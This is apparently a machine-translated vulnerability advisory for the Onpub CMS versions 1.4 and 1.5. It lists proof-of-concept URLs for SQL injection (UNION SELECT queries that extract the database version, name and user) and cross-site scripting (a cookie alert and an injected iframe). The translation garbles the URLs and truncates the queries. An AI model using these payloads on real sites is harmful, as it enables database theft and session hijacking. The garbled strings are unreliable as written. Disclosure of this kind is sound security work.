Release date:
Updated on:
Affected Systems:
Onpub 1.5
Onpub 1.4
Description:
--------------------------------------------------------------------------------
Bugtraq id: 63361
Onpub is a mobile website content management system.
Onpub 1.4, and other versions have cross-site scripting and multiple SQL Injection Vulnerabilities. Attackers can exploit these vulnerabilities to perform unauthorized database operations.
<* Source: Marcel Bernhardt
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
SQL-injection:
Http://www.example.com/onpub/manage/index.php? Onpub = EditWebsite & websiteID =-1% 27 [SQL-INJECTION
VULNERABILITY!]
Http://www.example.com/onpub/manage/index.php? Onpub = EditArticles & fullTextSearch = 1 & keywords =-1% 27 [SQL-INJECTION
VULNERABILITY!]
Http://www.example.com/onpub/manage/index.php? Onpub = EditWebsites & orderBy =-1% 27 [SQL-INJECTION
VULNERABILITY!] & Amp; order = ASC
Http://www.example.com/onpub/manage/index.php? Onpub = EditArticles & orderBy = title & order = [SQL-INJECTION
VULNERABILITY!]
Http://www.example.com/onpub/manage/index.php? Onpub = EditImage & imageID = 2% 27a [SQL-INJECTION
VULNERABILITY!]
Http://www.example.com/onpub/manage/index.php? Onpub = EditArticle & articleID = 1% 20 [SQL-INJECTION
VULNERABILITY!]
Http://www.example.com//index.php? Onpub = EditWebsite & websiteID =-1 union
Select
, 25, @ version --
Http://www.example.com//index.php? Onpub = EditWebsite & websiteID =-1 union
Select
, 25, @ database --
Http://www.example.com//index.php? Onpub = EditWebsite & websiteID =-1 union
Select
, 25, @ user --
Cross-site scripting:
Http://www.example.com/onpub/manage/index.php? Onpub = EditImages & page = 2% 27% 22% 3 Cscript % 3 Ealert % 28document. cookie % 29; % 3C/script % 3E
Http://www.example.com/onpub/manage/index.php? Onpub = EditImages & page = 137% 20> "<iframe % 20src = http://www.vulnerability-lab.com>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Onpub
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://onpub.com/